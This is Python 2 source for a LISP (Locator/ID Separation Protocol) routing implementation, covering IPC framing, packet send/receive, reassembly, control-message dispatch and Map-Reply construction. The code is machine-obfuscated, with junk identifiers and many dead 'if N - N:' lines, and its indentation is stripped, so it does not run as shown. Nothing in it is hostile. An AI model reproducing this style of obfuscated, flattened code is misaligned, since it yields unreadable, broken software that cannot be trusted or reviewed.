if 4 - 4: OOooOOo * OoooooooOO * i1IIi % I1ii11iIi11i % Oo0Ooo
if 1 - 1: OoO0O00 / iIii1I11I1II1 % I1ii11iIi11i - o0oOOo0O0Ooo
if 62 - 62: I1Ii111 % II111iiii
if 91 - 91: I11i % Ii1I - IiII + iIii1I11I1II1 * iIii1I11I1II1
if 91 - 91: i11iIiiIii + Ii1I
if 85 - 85: I11i % IiII
def lisp_api_ipc ( source , data ) :
return ( "api@" + str ( len ( data ) ) + "@" + source + "@@" + data )
if 68 - 68: Oo0Ooo . I1Ii111 - o0oOOo0O0Ooo * iIii1I11I1II1 - II111iiii % i1IIi
if 58 - 58: I11i / i11iIiiIii * i11iIiiIii
if 24 - 24: ooOoO0o - I1Ii111 * II111iiii - II111iiii
if 47 - 47: IiII - iIii1I11I1II1 / OoOoOO00 * iII111i - iIii1I11I1II1 % oO0o
if 93 - 93: Ii1I / iII111i
if 100 - 100: Oo0Ooo
if 94 - 94: I1ii11iIi11i / i1IIi * I1IiiI - I11i - I1ii11iIi11i
if 6 - 6: I1ii11iIi11i % o0oOOo0O0Ooo + o0oOOo0O0Ooo / OOooOOo / I1IiiI
if 67 - 67: OoOoOO00 . iII111i / OOooOOo * ooOoO0o + i1IIi
def lisp_ipc ( packet , send_socket , node ) :
if 100 - 100: OOooOOo . ooOoO0o + I1Ii111 . oO0o
if 20 - 20: i11iIiiIii - i1IIi - iIii1I11I1II1 - OoooooooOO
if 72 - 72: I1Ii111 . OoO0O00
if 59 - 59: I1IiiI * I11i % i1IIi
if ( lisp_is_running ( node ) == False ) :
lprint ( "Suppress sending IPC to {}" . format ( node ) )
return
if 77 - 77: OOooOOo * OoooooooOO + I1IiiI + I1IiiI % oO0o . OoooooooOO
if 60 - 60: iIii1I11I1II1
ii1iiiI = 1500 if ( packet . find ( "control-packet" ) == - 1 ) else 9000
if 37 - 37: i11iIiiIii * i11iIiiIii * OoOoOO00 + OoO0O00 . I1IiiI
OoO00oo00 = 0
iiiIIiiIi = len ( packet )
O00ooOoO = 0
I111iII = .001
while ( iiiIIiiIi > 0 ) :
o0O = min ( iiiIIiiIi , ii1iiiI )
OoO0oo = packet [ OoO00oo00 : o0O + OoO00oo00 ]
if 26 - 26: I1IiiI % iIii1I11I1II1 / OoO0O00
try :
send_socket . sendto ( OoO0oo , node )
lprint ( "Send IPC {}-out-of-{} byte to {} succeeded" . format ( len ( OoO0oo ) , len ( packet ) , node ) )
if 71 - 71: OoOoOO00 + iII111i - I1IiiI
O00ooOoO = 0
I111iII = .001
if 80 - 80: OoO0O00 . ooOoO0o
except socket . error , oOo :
if ( O00ooOoO == 12 ) :
lprint ( "Giving up on {}, consider it down" . format ( node ) )
break
if 58 - 58: iII111i / o0oOOo0O0Ooo . iII111i % OoO0O00
if 38 - 38: iIii1I11I1II1 % IiII * OoooooooOO - OOooOOo
lprint ( "Send IPC {}-out-of-{} byte to {} failed: {}" . format ( len ( OoO0oo ) , len ( packet ) , node , oOo ) )
if 15 - 15: I1IiiI + iIii1I11I1II1 . i11iIiiIii % oO0o
if 92 - 92: I11i
O00ooOoO += 1
time . sleep ( I111iII )
if 96 - 96: O0 / i1IIi - i11iIiiIii / OoOoOO00 + OoooooooOO
lprint ( "Retrying after {} ms ..." . format ( I111iII * 1000 ) )
I111iII *= 2
continue
if 12 - 12: oO0o . OOooOOo
if 76 - 76: oO0o - I11i * I1Ii111 . oO0o % iIii1I11I1II1
OoO00oo00 += o0O
iiiIIiiIi -= o0O
if 86 - 86: OoooooooOO + I1Ii111
return
if 5 - 5: I1ii11iIi11i
if 89 - 89: OoO0O00 - OoOoOO00 / II111iiii . I1ii11iIi11i
if 50 - 50: Ii1I * I1Ii111 * OoooooooOO . OoooooooOO
if 67 - 67: i11iIiiIii % ooOoO0o . I1ii11iIi11i + II111iiii . OoO0O00
if 42 - 42: I11i / OoO0O00 / OoO0O00 * OOooOOo
if 2 - 2: II111iiii % oO0o . I1Ii111
if 100 - 100: OoOoOO00 + OoOoOO00
def lisp_format_packet ( packet ) :
packet = binascii . hexlify ( packet )
OoO00oo00 = 0
oo0Oo0oo = ""
iiiIIiiIi = len ( packet ) * 2
while ( OoO00oo00 < iiiIIiiIi ) :
oo0Oo0oo += packet [ OoO00oo00 : OoO00oo00 + 8 ] + " "
OoO00oo00 += 8
iiiIIiiIi -= 4
if 26 - 26: II111iiii * iII111i + OOooOOo
return ( oo0Oo0oo )
if 28 - 28: Ii1I + O0
if 44 - 44: oO0o
if 51 - 51: o0oOOo0O0Ooo * o0oOOo0O0Ooo . Ii1I
if 14 - 14: OoO0O00 . I11i % II111iiii % i11iIiiIii + OoooooooOO
if 50 - 50: i11iIiiIii * I11i + i11iIiiIii - i1IIi
if 69 - 69: I1IiiI + IiII + oO0o * I1ii11iIi11i . iIii1I11I1II1 / OoooooooOO
if 77 - 77: Oo0Ooo - ooOoO0o
def lisp_send ( lisp_sockets , dest , port , packet ) :
o0oO0OooO0oo = lisp_sockets [ 0 ] if dest . is_ipv4 ( ) else lisp_sockets [ 1 ]
if 52 - 52: IiII + OoooooooOO . oO0o + O0 % iII111i
if 6 - 6: o0oOOo0O0Ooo + Oo0Ooo
if 45 - 45: oO0o % O0 / O0
if 98 - 98: I1Ii111
if 58 - 58: OOooOOo
if 6 - 6: I1ii11iIi11i
if 37 - 37: i11iIiiIii . II111iiii + OOooOOo + i1IIi * OOooOOo
if 18 - 18: ooOoO0o
if 18 - 18: I1Ii111 + OoOoOO00 % OOooOOo - IiII - i1IIi + I1ii11iIi11i
if 33 - 33: I11i * Ii1I / Oo0Ooo + oO0o % OOooOOo % OoooooooOO
if 29 - 29: Ii1I . II111iiii / I1Ii111
if 79 - 79: IiII . OoOoOO00 / oO0o % OoO0O00 / Ii1I + I11i
ii1i1II11II1i = dest . print_address_no_iid ( )
if ( ii1i1II11II1i . find ( "::ffff:" ) != - 1 and ii1i1II11II1i . count ( "." ) == 3 ) :
if ( lisp_i_am_rtr ) : o0oO0OooO0oo = lisp_sockets [ 0 ]
if ( o0oO0OooO0oo == None ) :
o0oO0OooO0oo = lisp_sockets [ 0 ]
ii1i1II11II1i = ii1i1II11II1i . split ( "::ffff:" ) [ - 1 ]
if 78 - 78: o0oOOo0O0Ooo + I1Ii111 % i11iIiiIii % I1IiiI - Ii1I
if 81 - 81: i11iIiiIii - II111iiii + I11i
if 52 - 52: II111iiii
lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Send" , False ) ,
len ( packet ) , bold ( "to " + ii1i1II11II1i , False ) , port ,
lisp_format_packet ( packet ) ) )
if 62 - 62: iII111i / OoO0O00 + i11iIiiIii / Oo0Ooo
if 26 - 26: I1ii11iIi11i - OoO0O00
if 19 - 19: iIii1I11I1II1 / I1ii11iIi11i + O0
if 12 - 12: I11i . OOooOOo + o0oOOo0O0Ooo . OoO0O00 + o0oOOo0O0Ooo
Oooo0 = ( LISP_RLOC_PROBE_TTL == 255 )
if ( Oooo0 ) :
I1I1 = struct . unpack ( "B" , packet [ 0 ] ) [ 0 ]
Oooo0 = ( I1I1 in [ 0x12 , 0x28 ] )
if ( Oooo0 ) : lisp_set_ttl ( o0oO0OooO0oo , LISP_RLOC_PROBE_TTL )
if 66 - 66: i11iIiiIii * IiII % IiII . I1IiiI / ooOoO0o
if 50 - 50: IiII . iII111i / o0oOOo0O0Ooo % OoOoOO00 * IiII % I11i
try : o0oO0OooO0oo . sendto ( packet , ( ii1i1II11II1i , port ) )
except socket . error , oOo :
lprint ( "socket.sendto() failed: {}" . format ( oOo ) )
if 15 - 15: Ii1I
if 29 - 29: I11i / I1IiiI / OoooooooOO . OoOoOO00 / I11i . I1Ii111
if 69 - 69: O0 * OoOoOO00 + o0oOOo0O0Ooo + I1IiiI % iII111i . OoooooooOO
if 45 - 45: I1Ii111 + oO0o - o0oOOo0O0Ooo - OoOoOO00 + I1IiiI / II111iiii
if 46 - 46: II111iiii . iIii1I11I1II1
if ( Oooo0 ) : lisp_set_ttl ( o0oO0OooO0oo , 64 )
return
if 62 - 62: I1ii11iIi11i % i1IIi % I1Ii111 * ooOoO0o % OOooOOo + I1IiiI
if 100 - 100: II111iiii - o0oOOo0O0Ooo * OoooooooOO . ooOoO0o / II111iiii / oO0o
if 43 - 43: iIii1I11I1II1 + ooOoO0o * iII111i + iIii1I11I1II1 . I1Ii111
if 87 - 87: I1Ii111
if 47 - 47: II111iiii + I1IiiI . Oo0Ooo / iIii1I11I1II1
if 14 - 14: i1IIi / OoO0O00 / iII111i % I1Ii111
if 72 - 72: OoO0O00 . II111iiii - IiII + IiII + iIii1I11I1II1 % oO0o
if 21 - 21: iII111i + OoOoOO00 - i11iIiiIii % O0 + OOooOOo
def lisp_receive_segments ( lisp_socket , packet , source , total_length ) :
if 30 - 30: o0oOOo0O0Ooo - Oo0Ooo + iII111i / O0
if 94 - 94: IiII
if 69 - 69: I1Ii111 . I1Ii111
if 53 - 53: i11iIiiIii + iII111i * Oo0Ooo - I1Ii111
if 61 - 61: o0oOOo0O0Ooo / OOooOOo . II111iiii - I1IiiI * i11iIiiIii
o0O = total_length - len ( packet )
if ( o0O == 0 ) : return ( [ True , packet ] )
if 8 - 8: iII111i % o0oOOo0O0Ooo
lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( packet ) ,
total_length , source ) )
if 87 - 87: Ii1I % I11i / I1Ii111
if 21 - 21: OoO0O00 + Ii1I / I1Ii111
if 75 - 75: I1Ii111 . Ii1I % iIii1I11I1II1 / OoOoOO00
if 38 - 38: i1IIi
if 1 - 1: I1ii11iIi11i + OoO0O00 % I11i . OOooOOo + i1IIi / oO0o
iiiIIiiIi = o0O
while ( iiiIIiiIi > 0 ) :
try : OoO0oo = lisp_socket . recvfrom ( 9000 )
except : return ( [ False , None ] )
if 35 - 35: ooOoO0o % OoOoOO00 % OoO0O00 + OOooOOo / IiII * OoOoOO00
OoO0oo = OoO0oo [ 0 ]
if 65 - 65: I1IiiI . Oo0Ooo + i1IIi - Ii1I * i1IIi
if 64 - 64: I1IiiI / OoO0O00 * I1IiiI * II111iiii . Ii1I
if 98 - 98: I1Ii111 + o0oOOo0O0Ooo
if 73 - 73: I1ii11iIi11i / I1Ii111 + i11iIiiIii + OoO0O00 . ooOoO0o
if 54 - 54: I1ii11iIi11i + IiII - oO0o + Oo0Ooo / IiII % Oo0Ooo
if ( OoO0oo . find ( "packet@" ) == 0 ) :
I111I = OoO0oo . split ( "@" )
lprint ( "Received new message ({}-out-of-{}) while receiving " + "fragments, old message discarded" , len ( OoO0oo ) ,
# I11i / O0 - II111iiii % Oo0Ooo - OoOoOO00
I111I [ 1 ] if len ( I111I ) > 2 else "?" )
return ( [ False , OoO0oo ] )
if 69 - 69: OOooOOo
if 43 - 43: OOooOOo
iiiIIiiIi -= len ( OoO0oo )
packet += OoO0oo
if 27 - 27: OOooOOo * II111iiii
lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( OoO0oo ) , total_length , source ) )
if 16 - 16: i11iIiiIii + I1ii11iIi11i
if 33 - 33: iIii1I11I1II1
return ( [ True , packet ] )
if 72 - 72: I1ii11iIi11i * i11iIiiIii
if 12 - 12: O0 - iIii1I11I1II1 % Oo0Ooo / O0 - IiII
if 55 - 55: OOooOOo . Oo0Ooo * OoOoOO00 / OoooooooOO * i11iIiiIii + oO0o
if 45 - 45: Ii1I
if 8 - 8: oO0o + OOooOOo
if 37 - 37: IiII - OoOoOO00 + oO0o - Oo0Ooo + IiII
if 33 - 33: Oo0Ooo % oO0o - I1IiiI + Oo0Ooo
if 90 - 90: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1 % IiII * I1Ii111 . I1Ii111
def lisp_bit_stuff ( payload ) :
lprint ( "Bit-stuffing, found {} segments" . format ( len ( payload ) ) )
IIii1i = ""
for OoO0oo in payload : IIii1i += OoO0oo + "\x40"
return ( IIii1i [ : - 1 ] )
if 90 - 90: o0oOOo0O0Ooo - O0 % O0 - oO0o . OoooooooOO
if 30 - 30: I11i + O0 / Ii1I / OoOoOO00 - oO0o + II111iiii
if 21 - 21: iIii1I11I1II1 % OoooooooOO * OOooOOo % i1IIi
if 73 - 73: OoooooooOO
if 100 - 100: I11i / i1IIi / i1IIi % Ii1I - II111iiii . OoooooooOO
if 72 - 72: Oo0Ooo * OoooooooOO % I1IiiI + I11i - II111iiii
if 82 - 82: iIii1I11I1II1 / i1IIi * I1IiiI . i11iIiiIii
if 56 - 56: Ii1I * I1IiiI / ooOoO0o * II111iiii
if 51 - 51: i1IIi . oO0o % OOooOOo
if 90 - 90: OoooooooOO + iII111i / iIii1I11I1II1
if 12 - 12: OoooooooOO
if 9 - 9: O0 / O0 / I1IiiI - oO0o . ooOoO0o
if 6 - 6: O0 - OoO0O00 + OoooooooOO % iIii1I11I1II1
if 58 - 58: i11iIiiIii * OOooOOo . Oo0Ooo / iII111i - i1IIi
if 45 - 45: Ii1I
if 89 - 89: ooOoO0o + I11i * O0 % OoOoOO00
if 2 - 2: I1Ii111 % iIii1I11I1II1 . Ii1I - II111iiii
if 33 - 33: I11i . i11iIiiIii % i1IIi * II111iiii * i11iIiiIii + OoOoOO00
if 26 - 26: I1IiiI % OoOoOO00 % I11i + Oo0Ooo
if 86 - 86: iII111i / i1IIi % Oo0Ooo
def lisp_receive ( lisp_socket , internal ) :
while ( True ) :
if 84 - 84: o0oOOo0O0Ooo * OOooOOo . I11i * Ii1I
if 32 - 32: ooOoO0o % ooOoO0o * I1ii11iIi11i % Ii1I + Oo0Ooo . OoOoOO00
if 2 - 2: I1Ii111 / ooOoO0o * oO0o + IiII
if 14 - 14: OoOoOO00 / iIii1I11I1II1 . o0oOOo0O0Ooo % i11iIiiIii . OoOoOO00
try : oOii1I = lisp_socket . recvfrom ( 9000 )
except : return ( [ "" , "" , "" , "" ] )
if 54 - 54: OOooOOo / I1ii11iIi11i % oO0o
if 66 - 66: I11i + iII111i
if 50 - 50: IiII
if 33 - 33: OOooOOo % I1IiiI - I1IiiI / IiII
if 22 - 22: ooOoO0o * ooOoO0o % o0oOOo0O0Ooo * Ii1I . OoO0O00
if 55 - 55: OoOoOO00 - I1ii11iIi11i + iIii1I11I1II1 - i11iIiiIii / i1IIi / II111iiii
if ( internal == False ) :
IIii1i = oOii1I [ 0 ]
oo00Oo0 = lisp_convert_6to4 ( oOii1I [ 1 ] [ 0 ] )
IiI1iI1 = oOii1I [ 1 ] [ 1 ]
if 37 - 37: Ii1I + o0oOOo0O0Ooo
if ( IiI1iI1 == LISP_DATA_PORT ) :
OOOoo = lisp_data_plane_logging
iiIIiI = lisp_format_packet ( IIii1i [ 0 : 60 ] ) + " ..."
else :
OOOoo = True
iiIIiI = lisp_format_packet ( IIii1i )
if 31 - 31: Ii1I . O0 / o0oOOo0O0Ooo + I11i
if 72 - 72: O0 * iIii1I11I1II1 - I1Ii111 / IiII * O0
if ( OOOoo ) :
lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Receive" ,
False ) , len ( IIii1i ) , bold ( "from " + oo00Oo0 , False ) , IiI1iI1 ,
iiIIiI ) )
if 52 - 52: I11i
return ( [ "packet" , oo00Oo0 , IiI1iI1 , IIii1i ] )
if 3 - 3: oO0o + Oo0Ooo
if 36 - 36: o0oOOo0O0Ooo % i1IIi
if 51 - 51: Ii1I * iII111i
if 24 - 24: iII111i * IiII / OOooOOo
if 64 - 64: iII111i * Oo0Ooo
if 42 - 42: ooOoO0o . O0 * ooOoO0o
oooO0Oo = False
oo00000ooOooO = oOii1I [ 0 ]
i1I1i1iI1iI1 = False
if 64 - 64: Ii1I
while ( oooO0Oo == False ) :
oo00000ooOooO = oo00000ooOooO . split ( "@" )
if 20 - 20: I11i
if ( len ( oo00000ooOooO ) < 4 ) :
lprint ( "Possible fragment (length {}), from old message, " + "discarding" , len ( oo00000ooOooO [ 0 ] ) )
if 58 - 58: Oo0Ooo * O0 - OoO0O00
i1I1i1iI1iI1 = True
break
if 70 - 70: Ii1I * i11iIiiIii
if 28 - 28: II111iiii / ooOoO0o * i11iIiiIii % OOooOOo
i1I1i1II = oo00000ooOooO [ 0 ]
try :
Iiii111 = int ( oo00000ooOooO [ 1 ] )
except :
oOoooO0 = bold ( "Internal packet reassembly error" , False )
lprint ( "{}: {}" . format ( oOoooO0 , oOii1I ) )
i1I1i1iI1iI1 = True
break
if 89 - 89: O0 % i1IIi * I1ii11iIi11i / OOooOOo % OoooooooOO / I1IiiI
oo00Oo0 = oo00000ooOooO [ 2 ]
IiI1iI1 = oo00000ooOooO [ 3 ]
if 12 - 12: i1IIi / II111iiii . I11i
if 61 - 61: OOooOOo % O0 . I1ii11iIi11i . iIii1I11I1II1 * I11i
if 29 - 29: ooOoO0o + i1IIi % IiII * Ii1I
if 94 - 94: OOooOOo / IiII
if 18 - 18: IiII - I11i / Ii1I % IiII * i1IIi
if 22 - 22: OoOoOO00 - Oo0Ooo
if 41 - 41: iIii1I11I1II1 * I1Ii111 / OoO0O00
if 33 - 33: I11i + O0
if ( len ( oo00000ooOooO ) > 5 ) :
IIii1i = lisp_bit_stuff ( oo00000ooOooO [ 4 : : ] )
else :
IIii1i = oo00000ooOooO [ 4 ]
if 9 - 9: I11i . iII111i * ooOoO0o * ooOoO0o
if 68 - 68: O0 - i11iIiiIii % iIii1I11I1II1 % ooOoO0o
if 12 - 12: II111iiii + I11i
if 9 - 9: I1ii11iIi11i
if 51 - 51: I1ii11iIi11i
if 37 - 37: I1IiiI % I1Ii111
oooO0Oo , IIii1i = lisp_receive_segments ( lisp_socket , IIii1i ,
oo00Oo0 , Iiii111 )
if ( IIii1i == None ) : return ( [ "" , "" , "" , "" ] )
if 22 - 22: o0oOOo0O0Ooo % OOooOOo - I11i + ooOoO0o / OOooOOo
if 98 - 98: I11i * O0 + IiII - oO0o
if 35 - 35: OoooooooOO * Ii1I
if 73 - 73: ooOoO0o . OoO0O00 % I1ii11iIi11i - oO0o
if 67 - 67: o0oOOo0O0Ooo . I11i + i1IIi
if ( oooO0Oo == False ) :
oo00000ooOooO = IIii1i
continue
if 100 - 100: Oo0Ooo - I1IiiI . OOooOOo % iIii1I11I1II1 . I11i
if 83 - 83: OoOoOO00 * iII111i
if ( IiI1iI1 == "" ) : IiI1iI1 = "no-port"
if ( i1I1i1II == "command" and lisp_i_am_core == False ) :
ooo = IIii1i . find ( " {" )
Oo = IIii1i if ooo == - 1 else IIii1i [ : ooo ]
Oo = ": '" + Oo + "'"
else :
Oo = ""
if 25 - 25: oO0o . OoO0O00 % Ii1I % Ii1I
if 94 - 94: iII111i . Ii1I
lprint ( "{} {} bytes {} {}, {}{}" . format ( bold ( "Receive" , False ) ,
len ( IIii1i ) , bold ( "from " + oo00Oo0 , False ) , IiI1iI1 , i1I1i1II ,
Oo if ( i1I1i1II in [ "command" , "api" ] ) else ": ... " if ( i1I1i1II == "data-packet" ) else ": " + lisp_format_packet ( IIii1i ) ) )
if 71 - 71: o0oOOo0O0Ooo * II111iiii / OOooOOo . OoO0O00
if 73 - 73: I1Ii111 * OoO0O00 / OoOoOO00 . II111iiii
if 87 - 87: OoO0O00 + Oo0Ooo + O0 % OoooooooOO - iIii1I11I1II1
if 100 - 100: Oo0Ooo + IiII
if 81 - 81: iIii1I11I1II1 + iIii1I11I1II1
if ( i1I1i1iI1iI1 ) : continue
return ( [ i1I1i1II , oo00Oo0 , IiI1iI1 , IIii1i ] )
if 19 - 19: ooOoO0o + i1IIi / Oo0Ooo * II111iiii * I1Ii111 / ooOoO0o
if 23 - 23: I1Ii111
if 76 - 76: Ii1I + Ii1I / i1IIi % o0oOOo0O0Ooo . iIii1I11I1II1 . OoOoOO00
if 75 - 75: I11i . Ii1I / I1ii11iIi11i
if 99 - 99: Ii1I
if 85 - 85: I1Ii111 + I1Ii111 + OoOoOO00 / ooOoO0o / o0oOOo0O0Ooo . Oo0Ooo
if 41 - 41: i1IIi % Ii1I . i1IIi * OoooooooOO % Ii1I
if 21 - 21: iII111i
def lisp_parse_packet ( lisp_sockets , packet , source , udp_sport , ttl = - 1 ) :
O0oOOoo0o0 = False
if 2 - 2: Ii1I / OOooOOo
Ii1I1i1IiiI = lisp_control_header ( )
if ( Ii1I1i1IiiI . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return ( O0oOOoo0o0 )
if 64 - 64: i1IIi % Oo0Ooo / O0 % Oo0Ooo
if 49 - 49: II111iiii * iIii1I11I1II1 / I11i - oO0o
if 76 - 76: I1Ii111 . Oo0Ooo - ooOoO0o . II111iiii - iII111i
if 36 - 36: iIii1I11I1II1 % Oo0Ooo
if 67 - 67: oO0o / II111iiii . I11i / oO0o
IIIIi1i1i1iII = source
if ( source . find ( "lisp" ) == - 1 ) :
IiII1iiI = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
IiII1iiI . string_to_afi ( source )
IiII1iiI . store_address ( source )
source = IiII1iiI
if 61 - 61: o0oOOo0O0Ooo % i1IIi / i11iIiiIii % I1ii11iIi11i . I1ii11iIi11i + OOooOOo
if 97 - 97: OOooOOo % iIii1I11I1II1 % OoO0O00 . I11i * o0oOOo0O0Ooo
if ( Ii1I1i1IiiI . type == LISP_MAP_REQUEST ) :
lisp_process_map_request ( lisp_sockets , packet , None , 0 , source ,
udp_sport , False , ttl )
if 64 - 64: OoOoOO00 + OoOoOO00 * IiII + I1ii11iIi11i % o0oOOo0O0Ooo
elif ( Ii1I1i1IiiI . type == LISP_MAP_REPLY ) :
lisp_process_map_reply ( lisp_sockets , packet , source , ttl )
if 25 - 25: oO0o + i11iIiiIii * OoooooooOO - iIii1I11I1II1
elif ( Ii1I1i1IiiI . type == LISP_MAP_REGISTER ) :
lisp_process_map_register ( lisp_sockets , packet , source , udp_sport )
if 47 - 47: Oo0Ooo . Ii1I
elif ( Ii1I1i1IiiI . type == LISP_MAP_NOTIFY ) :
if ( IIIIi1i1i1iII == "lisp-etr" ) :
lisp_process_multicast_map_notify ( packet , source )
else :
if ( lisp_is_running ( "lisp-rtr" ) ) :
lisp_process_multicast_map_notify ( packet , source )
if 25 - 25: I1ii11iIi11i / i1IIi * oO0o - II111iiii * i1IIi
lisp_process_map_notify ( lisp_sockets , packet , source )
if 57 - 57: OoO0O00 % OoO0O00
if 67 - 67: O0 . i11iIiiIii + iIii1I11I1II1
elif ( Ii1I1i1IiiI . type == LISP_MAP_NOTIFY_ACK ) :
lisp_process_map_notify_ack ( packet , source )
if 86 - 86: iIii1I11I1II1
elif ( Ii1I1i1IiiI . type == LISP_MAP_REFERRAL ) :
lisp_process_map_referral ( lisp_sockets , packet , source )
if 81 - 81: OOooOOo / I11i / OoooooooOO
elif ( Ii1I1i1IiiI . type == LISP_NAT_INFO and Ii1I1i1IiiI . is_info_reply ( ) ) :
O0o000 , o00oo0 , O0oOOoo0o0 = lisp_process_info_reply ( source , packet , True )
if 74 - 74: I11i + OoooooooOO % II111iiii % o0oOOo0O0Ooo
elif ( Ii1I1i1IiiI . type == LISP_NAT_INFO and Ii1I1i1IiiI . is_info_reply ( ) == False ) :
oo0o00OO = source . print_address_no_iid ( )
lisp_process_info_request ( lisp_sockets , packet , oo0o00OO , udp_sport ,
None )
if 27 - 27: OoO0O00 * Oo0Ooo
elif ( Ii1I1i1IiiI . type == LISP_ECM ) :
lisp_process_ecm ( lisp_sockets , packet , source , udp_sport )
if 80 - 80: i11iIiiIii . OoO0O00 - I11i % I11i
else :
lprint ( "Invalid LISP control packet type {}" . format ( Ii1I1i1IiiI . type ) )
if 21 - 21: I1IiiI . OoO0O00 * IiII % OoooooooOO - Oo0Ooo + Oo0Ooo
return ( O0oOOoo0o0 )
if 94 - 94: ooOoO0o
if 80 - 80: i11iIiiIii - O0 / I1Ii111 + OOooOOo % Oo0Ooo
if 95 - 95: II111iiii
if 76 - 76: OoO0O00 % iII111i * OoOoOO00 / ooOoO0o / i1IIi
if 45 - 45: Ii1I . I11i * I1Ii111 . i11iIiiIii
if 34 - 34: O0 * o0oOOo0O0Ooo / IiII
if 75 - 75: I1Ii111 - i1IIi - OoO0O00
def lisp_process_rloc_probe_request ( lisp_sockets , map_request , source , port ,
ttl ) :
if 25 - 25: iII111i . o0oOOo0O0Ooo
III1I1Iii1 = bold ( "RLOC-probe" , False )
if 62 - 62: I11i + i1IIi . I1ii11iIi11i - I1ii11iIi11i
if ( lisp_i_am_etr ) :
lprint ( "Received {} Map-Request, send RLOC-probe Map-Reply" . format ( III1I1Iii1 ) )
lisp_etr_process_map_request ( lisp_sockets , map_request , source , port ,
ttl )
return
if 68 - 68: ooOoO0o % OoooooooOO
if 94 - 94: Oo0Ooo * o0oOOo0O0Ooo
if ( lisp_i_am_rtr ) :
lprint ( "Received {} Map-Request, send RLOC-probe Map-Reply" . format ( III1I1Iii1 ) )
lisp_rtr_process_map_request ( lisp_sockets , map_request , source , port ,
ttl )
return
if 60 - 60: iII111i . OOooOOo
if 39 - 39: O0 - i11iIiiIii - I1IiiI / Oo0Ooo - i11iIiiIii
lprint ( "Ignoring received {} Map-Request, not an ETR or RTR" . format ( III1I1Iii1 ) )
return
if 30 - 30: OoO0O00 / OoOoOO00 + I1ii11iIi11i % IiII - OoO0O00
if 19 - 19: I1IiiI
if 99 - 99: OOooOOo - OOooOOo
if 98 - 98: o0oOOo0O0Ooo + O0 * oO0o - i11iIiiIii
if 83 - 83: o0oOOo0O0Ooo
def lisp_process_smr ( map_request ) :
lprint ( "Received SMR-based Map-Request" )
return
if 23 - 23: o0oOOo0O0Ooo . I11i
if 67 - 67: iII111i
if 52 - 52: IiII . OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / IiII . OoooooooOO . Oo0Ooo / ooOoO0o + O0
if 38 - 38: I11i
def lisp_process_smr_invoked_request ( map_request ) :
lprint ( "Received SMR-invoked Map-Request" )
return
if 66 - 66: II111iiii
if 57 - 57: OoO0O00 / Oo0Ooo % I1IiiI * I1ii11iIi11i
if 68 - 68: iII111i - o0oOOo0O0Ooo - OoO0O00 . O0 - i11iIiiIii
if 2 - 2: I1ii11iIi11i * i1IIi
if 17 - 17: I1ii11iIi11i * Ii1I % Oo0Ooo * I1Ii111 + OoO0O00 . OoooooooOO
if 60 - 60: Ii1I . II111iiii
if 36 - 36: IiII . iII111i * O0 . i1IIi * O0 * I1Ii111
def lisp_build_map_reply ( eid , group , rloc_set , nonce , action , ttl , rloc_probe ,
keys , enc , auth , mr_ttl = - 1 ) :
IiIIIi = lisp_map_reply ( )
IiIIIi . rloc_probe = rloc_probe
IiIIIi . echo_nonce_capable = enc
IiIIIi . hop_count = 0 if ( mr_ttl == - 1 ) else mr_ttl
IiIIIi . record_count = 1
IiIIIi . nonce = nonce
IIii1i = IiIIIi . encode ( )
IiIIIi . print_map_reply ( )
if 70 - 70: I1Ii111 * I11i % oO0o % ooOoO0o * iII111i - I1Ii111
iiI = lisp_eid_record ( )
iiI . rloc_count = len ( rloc_set )
iiI . authoritative = auth
iiI . record_ttl = ttl
iiI . action = action
iiI . eid = eid
iiI . group = group
if 5 - 5: IiII - iIii1I11I1II1 % oO0o % i1IIi
IIii1i += iiI . encode ( )
iiI . print_record ( " " , False )
if 68 - 68: OoooooooOO * Oo0Ooo / o0oOOo0O0Ooo * I11i + OoO0O00 . OoooooooOO
iII111111 = lisp_get_all_addresses ( ) + lisp_get_all_translated_rlocs ( )
if 71 - 71: OoO0O00 - ooOoO0o - I1IiiI + O0
for iIII in rloc_set :
iIii1IiIiI = lisp_rloc_record ( )
oo0o00OO = iIII . rloc . print_address_no_iid ( )
if ( oo0o00OO in iII111111 ) :
iIii1IiIiI . local_bit = True
iIii1IiIiI . probe_bit = rloc_probe
iIii1IiIiI . keys = keys
if ( iIII . priority == 254 and lisp_i_am_rtr ) :
iIii1IiIiI . rloc_name = "RTR"
if 91 - 91: I1ii11iIi11i % i1IIi
if 43 - 43: IiII / i11iIiiIii
iIii1IiIiI . store_rloc_entry ( iIII )
iIii1IiIiI . reach_bit = True
iIii1IiIiI . print_record ( " " )
IIii1i += iIii1IiIiI . encode ( )
if 41 - 41: I11i % I1Ii111 % iII111i . OOooOOo
return ( IIii1i )
if 46 - 46: I1ii11iIi11i + oO0o % I1Ii111
if 35 - 35: iIii1I11I1II1 + O0 * oO0o . i11iIiiIii
if 63 - 63: OOooOOo * OoooooooOO * iII111i
if 68 - 68: OoO0O00 / O0 + I1IiiI - i11iIiiIii
if 40 - 40: iIii1I11I1II1 / OoO0O00 * II111iiii + IiII % I1Ii111 / iIii1I11I1II1
if 79 - 79: iII111i . O0 * Oo0Ooo % o0oOOo0O0Ooo % OoO0O00
if 77 - 77: II111iiii - I1Ii111
def lisp_build_map_referral ( eid , group , ddt_entry , action , ttl , nonce ) :
O0OOoOoOO = lisp_map_referral ( )
O0OOoOoOO . record_count = 1
O0OOoOoOO . nonce = nonce
IIii1i = O0OOoOoOO . encode ( )
O0OOoOoOO . print_map_referral ( )
if 69 - 69: O0
iiI = lisp_eid_record ( )
if 37 - 37: i1IIi * iIii1I11I1II1 % OoooooooOO . OoooooooOO / Oo0Ooo % i11iIiiIii
OOO0Oo0o = 0
if ( ddt_entry == None ) :
iiI . eid = eid
iiI . group = group
else :
OOO0Oo0o = len ( ddt_entry . delegation_set )
iiI . eid = ddt_entry . eid
iiI . group = ddt_entry . group
ddt_entry . map_referrals_sent += 1
if 78 - 78: Oo0Ooo
iiI . rloc_count = OOO0Oo0o
iiI . authoritative = True
if 74 - 74: O0 / I11i
if 52 - 52: I1IiiI + oO0o * II111iiii
if 15 - 15: I11i
if 72 - 72: O0
if 15 - 15: II111iiii / I11i % II111iiii % Ii1I % i11iIiiIii / I1Ii111
IiiIIiIi1i11i = False
if ( action == LISP_DDT_ACTION_NULL ) :
